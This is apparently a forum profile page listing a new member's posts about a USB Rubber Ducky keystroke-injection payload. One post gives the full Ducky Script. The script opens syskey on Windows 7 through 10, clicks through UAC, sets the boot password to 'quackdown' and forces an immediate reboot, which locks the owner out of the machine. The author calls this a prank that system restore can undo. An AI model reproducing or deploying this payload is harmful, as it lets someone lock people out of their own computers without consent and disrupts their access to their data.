Jump to content

DarkHigh

Members
  • Posts

    4
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

DarkHigh's Achievements

Newbie

Newbie (1/14)

  1. Sorry again, new here, next one will be done properly. *~~Th3 M0r3 y0u kn0w~~*
  2. This works on Win 7/8/8.1/10 I uploaded with builtin forum tools. Here is the contents. Sorry for not specifying OS. REM ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| REM ||||||||||||||||||||||| SYSKEY AND REBOOT ||||||||||||||||||| REM |||||||||||||||||||||||| Made by DarkHigh ||||||||||||||||||||| REM ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| REM Delay 3 seconds for device initialization DELAY 3000 DEFAULT_DELAY 250 REM go to desktop GUI d DELAY 250 REM Open the run command type syskey and hit enter GUI r DELAY 500 STRING syskey ENTER DELAY 500 REM Click yes on UAC if its on ALT y REM Configure syskey to use password to boot and set password as quackdown DELAY 500 STRING u DELAY 250 STRING p DELAY STRING w DELAY STRING quackdown TAB DELAY STRING quackdown DELAY ENTER DELAY DELAY ENTER REM ok now lets reboot the system GUI r DELAY 500 STRING CMD ENTER DELAY 500 STRING shutdown /r /f /t 0 ENTER DELAY REM exit cmdprompt to wait on restart STRING exit ENTER
  3. Password that is set is "quackdown" without the "".
  4. This is my first contribution as I am brand new to RubberDucky, This payload sets the syskey password and requires password on reboot. The password is sets is "quackdown" . After setting the password it will force a reboot resulting in a locked computer. This is just a prank and can be fixed with system restore or you can just disable the password requirement by running syskey again. Total execute time should be right at 25 seconds. ducky_code.txt inject.bin
×
×
  • Create New...